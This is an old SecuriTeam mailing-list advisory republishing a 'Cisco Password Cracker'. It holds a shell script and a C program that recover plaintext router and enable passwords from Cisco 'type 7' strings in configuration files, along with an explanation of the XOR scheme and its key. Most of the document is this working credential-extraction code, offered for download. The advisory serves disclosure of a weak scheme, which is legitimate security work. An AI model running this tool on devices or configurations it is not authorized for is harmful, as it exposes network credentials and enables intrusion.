The following security advisory is sent to the securiteam mailing list, and can
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Cisco Password Cracker
------------------------------------------------------------------------
SUMMARY
DETAILS
decrypt.sh
#! /bin/sh
## Decrypts cisco "encrypted" passwords. Feed this confg files as stdin.
## Anything that looks like a "type 7 encrypted" string gets decrypted.
## This should really be a C program, but is presented as a script just to
## piss off a certain group of people. One beer, please...
while read xx ; do
case "$xx" in
*d\ 7\ [01]??* ) ;;
*) continue ;;
esac
DEC=`echo "$xx" | sed -e 's/.* //' -e 's/\(^..\).*/\1/'`
DP1=`expr $DEC + 1`
HEX=`echo "$xx" | sed -e 's/.* //' -e 's/^..\(..*\)/\1/'`
echo 'dsfd;kfoA,.iyewrkldJKDHSUB' | cut -c "${DP1}-30" >
/tmp/cis$$.pad
echo '#' > /tmp/cis$$.in
for xx in 1-2 3-4 5-6 7-8 9-10 11-12 13-14 15-16 17-18 19-20 21-22 ;
do
echo "${HEX}" | cut -c $xx | sed -e '/^$/q' -e 's/^/0x/' >>
/tmp/cis$$.in
done
echo -n "${DEC}${HEX}: "
data -g < /tmp/cis$$.in | xor /tmp/cis$$.pad
echo ''
done
rm -f /tmp/cis$$.pad /tmp/cis$$.in
exit 0
# Discussion:
# When "service password-encryption" is configured into a cisco router and
# the configuration subsequently viewed, the passwords are no longer
printed
# as plaintext but as strings of randomish-looking garbage. Analysis of
# several samples reveals the scrambling algorithm to be trivially weak.
# Dr. Delete derived and published an analysis and decryption program some
# time ago, but since that didn't seem to be generally available at the
time
# I went looking for it, here is an independent explanation. This was
worked
# out on PAPER over a plate of nachos in a hotel bar in downtown LA, but
# still illustrates where a general-purpose "xor" handler can be useful
for
# quickly cracking lame "proprietary" algorithms of this genre.
# Passwords can be up to eleven mixed-case characters. In the "encrypted"
# representation, the first two bytes of the long string are a random
decimal
# offset between 0 and 15 into a magic block of characters, and the
remaining
# bytes are ascii-hex representations of the password bytes xored against
# the character-block bytes from the given offset on down. The character
# block is "dsfd;kfoA,.iyewrkldJKDHSUB", which is enough for a
maximum-length
# password at the maximum offset.
# Another character block consisting of "sgvca69834ncxv9873254k;fg87" is
# located after the first one in the IOS image, which may be relevant to
# something else and is simply mentioned here for posterity. It is also
# interesting to note that the strings "%02d" and "%02x" occur immediately
# afterward, which in light of the above is another clue.
# EoF
ciscocrack.c
#include <stdio.h>
#include <ctype.h>
char xlat[] = {
0x64, 0x73, 0x66, 0x64, 0x3b, 0x6b, 0x66, 0x6f,
0x41, 0x2c, 0x2e, 0x69, 0x79, 0x65, 0x77, 0x72,
0x6b, 0x6c, 0x64, 0x4a, 0x4b, 0x44, 0x48, 0x53,
0x55, 0x42, 0x73, 0x67, 0x76, 0x63, 0x61, 0x36,
0x39, 0x38, 0x33, 0x34, 0x6e, 0x63, 0x78, 0x76,
0x39, 0x38, 0x37, 0x33, 0x32, 0x35, 0x34, 0x6b,
0x3b, 0x66, 0x67, 0x38, 0x37,
0x64, 0x73, 0x66, 0x64, 0x3b, 0x6b, 0x66, 0x6f,
0x41, 0x2c, 0x2e, 0x69, 0x79, 0x65, 0x77, 0x72,
0x6b, 0x6c, 0x64, 0x4a, 0x4b, 0x44, 0x48, 0x53,
0x55, 0x42, 0x73, 0x67, 0x76, 0x63, 0x61, 0x36,
0x39, 0x38, 0x33, 0x34, 0x6e, 0x63, 0x78, 0x76,
0x39, 0x38, 0x37, 0x33, 0x32, 0x35, 0x34, 0x6b,
0x3b, 0x66, 0x67, 0x38, 0x37
};
/* Extract from an IOS 12.2(8)
0df4a70: 6473 6664 3b6b 666f dsfd;kfo
0df4a80: 412c 2e69 7965 7772 6b6c 644a 4b44 4853 A,.iyewrkldJKDHS
0df4a90: 5542 7367 7663 6136 3938 3334 6e63 7876 UBsgvca69834ncxv
0df4aa0: 3938 3733 3235 346b 3b66 6738 3700 0000 9873254k;fg87...
*/
char pw_str1[] = "password 7 ";
char pw_str2[] = "enable-password 7 ";
char *pname;
cdecrypt(enc_pw, dec_pw)
unsigned char *enc_pw;
unsigned char *dec_pw;
{
unsigned int seed, i, val = 0;
if(strlen(enc_pw) & 1)
return(-1);
seed = (enc_pw[0] - '0') * 10 + enc_pw[1] - '0';
if (seed > 15 || !isdigit(enc_pw[0]) || !isdigit(enc_pw[1]))
return(-2);
for (i = 2 ; i <= strlen(enc_pw); i++) {
if(i !=2 && !(i & 1)) {
dec_pw[i / 2 - 2] = val ^ xlat[seed++];
val = 0;
}
val *= 16;
if(isdigit(enc_pw[i] = toupper(enc_pw[i]))) {
val += enc_pw[i] - '0';
continue;
}
if(enc_pw[i] >= 'A' && enc_pw[i] <= 'F') {
val += enc_pw[i] - 'A' + 10;
continue;
}
if(strlen(enc_pw) != i)
return(-4);
}
dec_pw[++i / 2] = 0;
return(0);
}
usage()
{
fprintf(stdout, "Usage: %s -p <encrypted password>\n", pname);
fprintf(stdout, " %s <router config file> <output file>\n",
pname);
return(0);
}
main(argc,argv)
int argc;
char **argv;
{
FILE *in = stdin, *out = stdout;
char line[512];
char passwd[512];
unsigned int i, pw_pos;
pname = argv[0];
if(argc > 1)
{
if(argc > 3) {
usage();
exit(1);
}
if(argv[1][0] == '-')
{
switch(argv[1][1]) {
case 'h':
usage();
break;
case 'p':
if(cdecrypt(argv[2], passwd)) {
fprintf(stderr, "Error.\n");
exit(1);
}
fprintf(stdout, "password: %s\n", passwd);
break;
default:
fprintf(stderr, "%s: unknow option.",
pname);
}
return(0);
}
if((in = fopen(argv[1], "rt")) == NULL)
exit(1);
if(argc > 2)
if((out = fopen(argv[2], "wt")) == NULL)
exit(1);
}
while(1) {
for(i = 0; i < 256; i++) {
if((line[i] = fgetc(in)) == EOF) {
if(i)
break;
fclose(in);
fclose(out);
return(0);
}
if(line[i] == '\r')
i--;
if(line[i] == '\n')
break;
}
pw_pos = 0;
line[i] = 0;
if(!strncmp(line, pw_str1, strlen(pw_str1)))
pw_pos = strlen(pw_str1);
if(!strncmp(line, pw_str2, strlen(pw_str2)))
pw_pos = strlen(pw_str2);
if(!pw_pos) {
fprintf(stdout, "%s\n", line);
continue;
}
if(cdecrypt(&line[pw_pos], passwd)) {
fprintf(stderr, "Error. N %02d\n");
exit(1);
}
else {
if(pw_pos == strlen(pw_str1)) {
fprintf(out, "%s", pw_str1); }
else {
fprintf(out, "%s", pw_str2);
}
fprintf(out, "%s\n", passwd);
}
}
}
/* EoF */
ADDITIONAL INFORMATION
The information has been provided by PacketStorm and
<mailto:Jerome.Poggi@hsc-labs.com> Jerome Poggi .
To keep updated with the tool visit the project's homepage at:
<http://packetstorm.linuxsecurity.com/Exploit_Code_Archive/ciscocrack.c>
http://packetstorm.linuxsecurity.com/Exploit_Code_Archive/ciscocrack.c
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to:
list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to:
list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any
kind.
In no event shall we be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special
damages.
